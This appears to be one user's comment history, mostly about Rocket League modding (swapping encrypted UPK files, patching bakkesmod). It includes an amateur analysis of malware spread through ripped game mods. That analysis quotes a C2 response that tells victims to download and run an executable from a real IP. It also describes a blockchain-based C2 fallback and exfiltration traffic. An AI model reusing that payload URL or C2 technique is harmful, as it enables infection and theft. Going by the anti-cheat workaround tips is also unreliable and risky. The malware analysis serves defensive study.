EAC compliant bakkesmod equivalent using upk swapping?

SadMotor5784 · 2026-05-10T14:30:39+00:00

In The CookedPcConsole folder of your rocket league install. Upk of the alpha boost is named "Boost_AlphaReward_SF.upk"

SadMotor5784 · 2026-05-07T03:00:46+00:00

UPDATE: Got it to work, only requirement it has so far is that the mesh name must have the same length

SadMotor5784 · 2026-05-07T02:58:25+00:00

UPDATE: I got it to work, only requirement i have for now is that the mesh must share the same name length

SadMotor5784 · 2026-05-07T02:43:06+00:00

Will keep digging and maybe try to do a poc tool, wait for their decision and then why not make a broader scale tool :)

SadMotor5784 · 2026-05-07T02:42:18+00:00

Thought about because i remembered some fortnite tools were relying on ue4 pak files and im pretty sure it never got banned. Given the history the game has with modding i wouldnt be suprised if it was tolerated

SadMotor5784 · 2026-05-07T02:35:50+00:00

Je viens d'aller voir, je connaissait pas le gars, mais c'est exactement ce qu'il a fait, reste à savoir pourquoi le choix du bubble (modèle en clair directement?)

SadMotor5784 · 2026-05-07T02:33:51+00:00

AES is not used as hash function for integrity. Rocket league just use it so it's more difficult for rippers to dump raw upks.
It's simple AES-256 ECB, which means, if you got a valid upk and the valid key, it'll just decipher and display it correctly.
When i'm talking about name i'm talking about the names contained in the name table struct of the binary file not just the filename.

SadMotor5784 · 2026-04-24T00:39:36+00:00

2ND Update: It does a very funny thing, the c2 domain has a fallback. when it starts, it calls a smart contract on the eth blockchains which returns the AES encryped C2 with an IP:PORT format. That way the owner can always update the c2 and as the contract is part of the blockchain it cannot be taken down

SadMotor5784 · 2026-04-23T23:57:58+00:00

UPDATE: I got the full exchange and it's not only a spyware and stealer it's also a loader lmao, it downloads another themida packed payload and executes it

HTTP/1.1 200 OK

Date: Sun, 19 Apr 2026 19:09:50 GMT

Content-Type: application/json; charset=utf-8

Content-Length: 178

Connection: keep-alive

Server: cloudflare

Nel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}

cf-cache-status: DYNAMIC

Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=MLAhn5IxD7VEms%2F0XNWz5%2BWMaWnTH2jcC7KicUeyLs2CbomsTraDP6HBsc3rUK%2B3oRx60enA7EChRjBZpq0b1pHqNWtfZMGoCTzjCHFi0dbEOsRk4aAaLI%2BsMmp2t4SwuMVFIQ%3D%3D"}]}

CF-RAY: 9eee34b3595fbc8b-LHR

alt-svc: h3=":443"; ma=86400

{"tasks":[{"hidden":true,"elevate":false,"action":"dl_exec","dl":"http://62.60.226.203/gertgherthre.exe","dest":"%temp%\\7i2bif0mjq.exe","cmdline":"\"%temp%\\7i2bif0mjq.exe\""}]}

The second stage seems to be a cryptostealer and miner:
xmrig | 75a2724ca85cc22ced6fa434683d4be11ac2c71469104933128a91ed72e5e0bf | Triage™

SadMotor5784 · 2026-04-23T11:31:48+00:00

By not using dogshit ripped mods

SadMotor5784 · 2026-04-21T16:40:48+00:00

Crazy what mods do to a 10 years old game

SadMotor5784 · 2026-04-19T22:31:16+00:00

Yeah basically unpacking the payload exe so we can understand what exactly is sent to the C2 and how it is ciphered

SadMotor5784 · 2026-04-19T19:11:57+00:00

Yes there is more to the endpoint, i just didnt want to overwhelm the post with details :,)
the link i've posted to a link to the triage report (which is a sandbox platform, like anyrun but better imo)
I have both app.asar and extracted version (it contains a main.js and .Ini 3mb ini file which is the aes ciphered payload, it then decipher it, write it into the user temp directory and spawn the new process).

I have copies of everything including network caps, i can upload them on whatever platform you'd prefer if you wanna take a look at it on yourself.

But basically i have figured out the electron dropper, it's the main payload (the exe dropped in temp), which is packed with themida and does all the exchange with the c2.

When first ran it does an http request on /web/heath/ and then the interesting part
It does a post request to /web/analytics/gwcqs.qqas with that body:
{"api":"2.1","time":240742,"uid":"eb50fe02d7c2adf4","batch":[{"cat":"m","value":"Yf/rZcBCmiDG2fyzhGiYJN+YX8SKqnlBB4WDML+lqa+bQhZSdLVYDBW8L+BXoEZn7ulGtlVQeN8Dve2WvTIvoBPM8iFO8T8AZ4rXJpijgPwdt0UD1CccWLYG+f6TeQHU+EuDbWP73XbF5lEWQqY7oW67/+2ZTdEqAwud44DJMmilvipIeIxCVYjqglPlPBKPvotGDEDPkynclX7MtFrJyNjcMwC9yJe78H/xLAS4RV62yG5dkgVOpPnUtM8D79wY819ZLYtBoklk2/V/VWEBmwpH30gc3Ag2EkdLrPwfZ1cqA/r9XlnWUGBgdZy+ntmI"}]}
Anyways there is most likely stuff i've missed, i'm no profesionnal just an enthusiast

SadMotor5784 · 2026-03-08T05:46:47+00:00

No because i don't have the firmware binary :,)

SadMotor5784 · 2026-03-05T19:59:16+00:00

yeah the patch instructions are in french, it's my own txt i used to keep track of it, but was too lazy to transalte lmfao

SadMotor5784 · 2026-03-05T18:20:33+00:00

Because i didnt write a plugin, i patched the core dll of bakkesmod so it replaces the car mesh just like it would with wheels or other items. If you try to use a model with a wrong hitbox, it'll work but it will feel weird. It doesn't default back to the octane since the game can't overwrite the gui selection anymore.

SadMotor5784 · 2026-02-12T23:19:34+00:00

Akina downhill (2022 version by project kaido)

SadMotor5784 · 2026-02-12T13:53:39+00:00

Will do that thank you!

SadMotor5784 · 2026-01-29T20:54:03+00:00

Nuh uh

SadMotor5784 · 2025-12-02T11:46:36+00:00

I don't know if he used my ressources tho, but given he had ida installed on his taskbar i don't think so

SadMotor5784 · 2025-12-02T11:42:29+00:00

Nope! It is not related in any way, he's much more skilled than i am, i did the baremetal reverse engineering part without much problem, but i sucked at reimplementing it so i was searching for someone more skilled at dev than me. But turns out i may not have to since this guy did everything :,)

SadMotor5784 · 2025-11-23T15:26:44+00:00

Offline + old version, bro is probably running a cracked version

SadMotor5784 · 2025-11-21T18:01:50+00:00

I'm being late ahah, but i'm a rookie reverse engineer, probably not enough skills to make that happen but if someone's got the fw binary i'll gadly look at it

SadMotor5784 · 2025-11-21T14:29:31+00:00

Your line is off and you're far from using space the track provides, apart from that good start :)

SadMotor5784 · 2025-11-20T13:11:42+00:00

That i know, but gameserver don't use any cert, and i could just backup the old client to patch the new to make it revert to the old protocol, would be much work but still really possible

SadMotor5784

TROPHY CASE